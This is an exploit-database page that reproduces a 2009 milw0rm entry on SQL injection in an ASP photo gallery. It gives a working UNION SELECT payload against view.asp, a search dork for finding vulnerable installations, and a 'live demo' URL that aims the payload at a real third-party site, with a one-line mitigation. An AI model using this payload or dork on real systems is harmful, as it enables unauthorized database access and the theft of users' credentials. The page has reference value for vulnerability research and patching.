header-logo
Suggest Exploit
vendor:
A Better Member-Based ASP Photo Gallery
by:
milw0rm.com
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: A Better Member-Based ASP Photo Gallery
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

A Better Member-Based ASP Photo Gallery

A Better Member-Based ASP Photo Gallery is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. This can allow the attacker to access the database and gain access to sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Script:A Better Member-Based ASP Photo Gallery
Download:
http://www.ontarioabandonedplaces.com/ipguardian/ABetterMemberBasedASPPhotoGallery.zip
Demo:
www.ontarioabandonedplaces.com/ipguardian/gallery
Exploit:www.target.com/scriptpath/view.asp?entry=-1+union+select+0,title,2,creator,Longitude,5,pics+from+photos
Dork:intitle:"A Better ASP User Gallery"
Live Demo:
www.ontarioabandonedplaces.com/ipguardian/gallery/view.asp?entry=-1+union+select+0,title,2,creator,Longitude,5,pics+from+photos
BackDoordan Sevgilerle Thanks All Cyber-Warrior User : )
BackDoor Cyber-Warrior.Org - Akıncılar - Lojistik

# milw0rm.com [2009-02-09]

Navigation

Suggest Exploit

Services By CQR